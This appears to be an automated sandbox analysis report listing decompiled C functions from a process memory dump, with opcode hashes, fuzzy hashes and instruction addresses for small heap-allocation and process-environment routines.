0x046c8d5c
0x046c8d6e
0x046c8d5e
0x046c8d67
0x046c8d67
0x046c8d79
0x046c8d7a
0x046c8d7c
0x046c8d81
0x046c8d94

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1852e6aa59b0fcb882dbc48d13f7b423d9fea24105f8cb2ef98e1975aacc3610
Instruction ID: 6d282d2e7762e76a3eb38775483a048af83e4152017162d4ec1c9dfb3c1dad00
Opcode Fuzzy Hash: 1852e6aa59b0fcb882dbc48d13f7b423d9fea24105f8cb2ef98e1975aacc3610
Instruction Fuzzy Hash: 7FF09A70E04648AFDB14EBA8D441A6EB7B4EB18701F10809AE905EB291FA38F9008B58

Uniqueness

Uniqueness Score: -1.00%

Function 0463927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0463927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0463FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E046392C6(_t11, _t14);
				}
				return _t11;
			}

0x04639295
0x04639299
0x0463929f
0x046392aa
0x046392ad
0x046392ae
0x046392af
0x046392b0
0x046392b4
0x046392bb
0x046392bb
0x046392c5

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 5edaadd27c5cfe1b7d4929864ab873fa203ef39afe98ae34fa4a0ad0ef2bf215
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 57E02B727409406BE7119E19CC80F03375DDF82725F04407CB5001F252DAE5EC0C8BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0461746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0461746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0460EB70(__ecx, 0x46e79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E046395D0();
							L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x0461746d
0x0461746d
0x0461746d
0x04617471
0x04617488
0x0465f92d
0x0461748e
0x04617491
0x04617495
0x0465f937
0x0465f93a
0x0465f94e
0x0465f953
0x0465f956
0x0465f956
0x04617495
0x00000000
0x04617488
0x04617473
0x04617478
0x0461747d
0x04617481
0x00000000
0x04617481
0x0461747d
0x0461747a
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fafdafc7b2c51860576a367266b8b98c1700edf11bcf7044c37fa6d0d17fd71
Instruction ID: c32284650e54d82e724b2c96cfc9bb5901543404344feb894c40f9b1704d6344
Opcode Fuzzy Hash: 7fafdafc7b2c51860576a367266b8b98c1700edf11bcf7044c37fa6d0d17fd71
Instruction Fuzzy Hash: D5F0E934A00344AADF059BA8C840B7A7FB1AF14316F0C0519D951A7270F765B801CB89

Uniqueness

Uniqueness Score: -1.00%

Function 046C8CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E046C8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x46ed360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04617D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0463B640(E04639AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x046c8ce5
0x046c8ced
0x046c8cf0
0x046c8cfb
0x046c8d0d
0x046c8cfd
0x046c8d06
0x046c8d06
0x046c8d18
0x046c8d19
0x046c8d1b
0x046c8d20
0x046c8d33

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b462923448a2f0c847cf26ee6e59e743c1a905d650a149f000ec000f97a23713
Instruction ID: eb5d3fd7452d2736a227c486e1350764a4e7cab37fb41568d9e045f74ece4bbf
Opcode Fuzzy Hash: b462923448a2f0c847cf26ee6e59e743c1a905d650a149f000ec000f97a23713
Instruction Fuzzy Hash: C0F08270A04648ABDB04EBA9E945E6E77B4EF19305F14019EE916EB391FA34F900C758

Uniqueness

Uniqueness Score: -1.00%

Function 046C8B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E046C8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x46ed360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04617D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0463B640(E04639AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x046c8b67
0x046c8b6f
0x046c8b72
0x046c8b7d
0x046c8b8f
0x046c8b7f
0x046c8b88
0x046c8b88
0x046c8b9a
0x046c8b9b
0x046c8b9d
0x046c8ba2
0x046c8bb5

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87ab64e1b767d1ed5ec693a01ff17c2675ec55d8e94eb97150131afc85b272b4
Instruction ID: 95b8f2c077c3267cda23af83b8515665d6ac9b8f42810c54eadf570712461eca
Opcode Fuzzy Hash: 87ab64e1b767d1ed5ec693a01ff17c2675ec55d8e94eb97150131afc85b272b4
Instruction Fuzzy Hash: 58F082B0A14259ABEB10EBA8D906E7EB3B4EF04705F04045DB905DB391FA74E900C798

Uniqueness

Uniqueness Score: -1.00%

Function 045F4F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045F4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E046C88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0461C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x45d1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x045f4f2e
0x045f4f34
0x045f4f38
0x04650b85
0x04650b85
0x04650b89
0x04650b9a
0x04650b9a
0x04650b9f
0x00000000
0x04650b9f
0x04650b94
0x04650b98
0x00000000
0x00000000
0x00000000
0x04650b98
0x045f4f3e
0x045f4f48
0x00000000
0x045f4f6e
0x00000000
0x045f4f70

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abf1435186654955c26510111c6adb0a253c079bcf8f96c487483f4d89e7f4b7
Instruction ID: 7a863cdedbb8b48d39b12d683e9976d59d918fd7988d067857806cebe5f252da
Opcode Fuzzy Hash: abf1435186654955c26510111c6adb0a253c079bcf8f96c487483f4d89e7f4b7
Instruction Fuzzy Hash: 55F0EC329226958FE771DB28C1D0B22B7E8EF207B8F044868D80687B30E725FD80C680

Uniqueness

Uniqueness Score: -1.00%

Function 0462A44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0462A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x46e7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L04614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0463FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x0462a44b
0x0462a453
0x0462a472
0x0462a476
0x00000000
0x0462a493
0x0462a47a
0x0462a47f
0x0462a486
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1802d6b5e2c5793baf4ae5c37d0b8eeac21bb315a4f7ef64c7fc00d3cb7a8720
Instruction ID: a7095214f6a2820d5c6aa0f656ff887b860bd5294802b602fa0c169bf363bf25
Opcode Fuzzy Hash: 1802d6b5e2c5793baf4ae5c37d0b8eeac21bb315a4f7ef64c7fc00d3cb7a8720
Instruction Fuzzy Hash: F7E09272B01821ABD3115E58AD00F66739DDBE4655F094039F504C7220EA68ED02CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 045FF358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E045FF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0462F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04614620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x045ff35d
0x045ff361
0x045ff367
0x045ff372
0x045ff38c
0x045ff38c
0x045ff394

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 36fa28e131ea7403bc115540780a6f4b3faec9f3991e6a222971be809caf7f34
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 90E0D833A40118BBDB3196D9AE05F5BBBBDEB44B60F040156BA04D7590D970AD00D6D1

Uniqueness

Uniqueness Score: -1.00%

Function 0460FF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0460FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x45d11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E046C88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04610050(_t14);
				}
			}

0x0460ff66
0x0460ff6b
0x00000000
0x0460ff8f
0x00000000
0x0460ff8f

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 934173a7ea5e0167ad68d1b157955c9d3481ffb4041f9eb72261416e4c5067e8
Instruction ID: 0d04e5d751262485238d41860459a1f65db89ae4d83ada4620c843ff9529b219
Opcode Fuzzy Hash: 934173a7ea5e0167ad68d1b157955c9d3481ffb4041f9eb72261416e4c5067e8
Instruction Fuzzy Hash: 7AE0DFB020D2049FEB3CDF55D040F273798EF62726F19C01DE0084B682EAA1F882C20A

Uniqueness

Uniqueness Score: -1.00%

Function 046841E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E046841E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x46d08f0);
				_t5 = E0464D08C(__ebx, __edi, __esi);
				if( *0x46e87ec == 0) {
					E0460EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x46e87ec == 0) {
						 *0x46e87f0 = 0x46e87ec;
						 *0x46e87ec = 0x46e87ec;
						 *0x46e87e8 = 0x46e87e4;
						 *0x46e87e4 = 0x46e87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04684248();
				}
				return E0464D0D1(_t5);
			}

0x046841e8
0x046841ea
0x046841ef
0x046841fb
0x04684206
0x0468420b
0x04684216
0x0468421d
0x04684222
0x0468422c
0x04684231
0x04684231
0x04684236
0x0468423d
0x0468423d
0x04684247

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bc79ad79158f2a06a9c23a548231e3e9a809d1e33d7baabe8312cfcc9f55f98
Instruction ID: 5dc32d7cbf192fe3ecc1c572a49cce4a292c8ea51336702966f3b2837eade156
Opcode Fuzzy Hash: 4bc79ad79158f2a06a9c23a548231e3e9a809d1e33d7baabe8312cfcc9f55f98
Instruction Fuzzy Hash: 0FF0F2748517008EEFA0FFABA50479C36E4E784718F10622E90009B284FB386884CF05

Uniqueness

Uniqueness Score: -1.00%

Function 046AD380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046AD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L045FE8B0(__ecx, _a4, 0xfff);
					L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x046ad38a
0x046ad39b
0x046ad3b1
0x00000000
0x046ad3b6
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: f85319abfc2dc34c2cf7ad631e1ef556b19bfdcb27cb4da9d67ffc70fd73c7a5
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 80E0CD31240604B7EB225E44CC00F657717DB50795F104031FE045ABA0D575BC61EAC4

Uniqueness

Uniqueness Score: -1.00%

Function 0462A185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0462A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x46e67e4 >= 0xa) {
					if(_t5 < 0x46e6800 || _t5 >= 0x46e6900) {
						return L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04610010(0x46e67e0, _t5);
				}
			}

0x0462a190
0x0462a1a6
0x0462a1c2
0x00000000
0x00000000
0x00000000
0x0462a192
0x0462a192
0x0462a19f
0x0462a19f

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aef6d8f6ced17cd7dc5917112a643fffa7670943b510577626a46d81ec7b1b7
Instruction ID: b8f5108e4bad1e88b4bc213eda44b79ea8e85f71d4fb64422574160bc400238a
Opcode Fuzzy Hash: 5aef6d8f6ced17cd7dc5917112a643fffa7670943b510577626a46d81ec7b1b7
Instruction Fuzzy Hash: 15D02B2112240026FB1D5B41EA18B312293E79472CF704C0CF3032A9A0F9A0FCD4C50C

Uniqueness

Uniqueness Score: -1.00%

Function 046216E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046216E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04621710(0x46e67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04614620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x046216e8
0x046216ef
0x046216f3
0x046216fe
0x00000000
0x04621700
0x0462170d
0x0462170d
0x046216f2
0x046216f2
0x046216f2
0x046216f2

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dab9cf8f0fc0c43754881c4dc1c9e073fb0e3211c0828104249d770b7061a43
Instruction ID: 2f2c8144e73ba35708af91e5ec2db4d791da51db3fb072b09edd4198ef90ed31
Opcode Fuzzy Hash: 3dab9cf8f0fc0c43754881c4dc1c9e073fb0e3211c0828104249d770b7061a43
Instruction Fuzzy Hash: 8CD0A77130550072FE2D5B119914B593252DBD1789F3C005CF517595D0EFA4FD92E84C

Uniqueness

Uniqueness Score: -1.00%

Function 046753CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046753CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0460EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x046753ca
0x046753ce
0x046753d9
0x046753de
0x046753e1
0x046753e1
0x046753e6
0x046753f3
0x00000000
0x046753f8
0x046753fb

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 911786130da464cf8c9e870f141c758097ddaf02e75547a6e99856cb9f39ff14
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: BAE08C31900680ABDF12EB58C650F4EB7F5FB44B00F180448A0095BB70E624BC00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 046235A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046235A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0460EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x046235a1
0x046235a1
0x046235a5
0x046235ab
0x046235ab
0x046235b5
0x00000000
0x046235c1
0x046235b7

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 85c13ee25dd3fbfd92e4056ac2b84e006eacd9d12726ccf46685445596ee1bca
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 75D0A731501992B9DB01AB30C3147683373BB00308F58105988492D759E33E6D8BDE04

Uniqueness

Uniqueness Score: -1.00%

Function 0460AAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0460AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x0460aab6
0x0460aabb
0x0465a442
0x00000000
0x0465a448
0x0465a454
0x0465a454
0x0460aac1
0x0460aac1
0x0460aac6
0x0460aac6

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 9338a5b04ea45a647253d644dd2702969c42fc1cf49b4d4dbbb9d3c0932fa864
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: F8D0E935352A80CFD71ACF5DC554B1673A4BB54B84FC54990E941CBB62E62CE984CA00

Uniqueness

Uniqueness Score: -1.00%

Function 0467A537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0467A537(intOrPtr _a4, intOrPtr _a8) {

				return L04618E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0467a553

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: b52180afbc950a3147e7390ceba4b7fdf9a4ea54d12e975f7bdaea852aeacbba
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: A1C01232180248BBCB126F81CC00F067F2AEB94B60F048014BA080B5708632E970EA88

Uniqueness

Uniqueness Score: -1.00%

Function 045FDB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045FDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04614620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x045fdb4d
0x045fdb54
0x045fdb5f
0x045fdb56
0x045fdb56
0x045fdb5c
0x045fdb5c

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: dc47fe9256ff98165cc02590fd6252dc7b74cd49648a62ff14c381f6e0babf16
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 3FC08C70390A00AAEB221F20CD01F0036A1BB00B49F4800A06301DB0F0EF78E801EA00

Uniqueness

Uniqueness Score: -1.00%

Function 045FAD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045FAD30(intOrPtr _a4) {

				return L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x045fad49

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 2547a9fc192c3b31ee4acad61ff5e6f4557aecd913990e29f176a9f663e68839
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 31C08C32080248BBC7126A45CD00F017B29E790B60F040020F6040A6718932E860D588

Uniqueness

Uniqueness Score: -1.00%

Function 04613A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04613A1C(intOrPtr _a4) {
				void* _t5;

				return L04614620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x04613a35

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

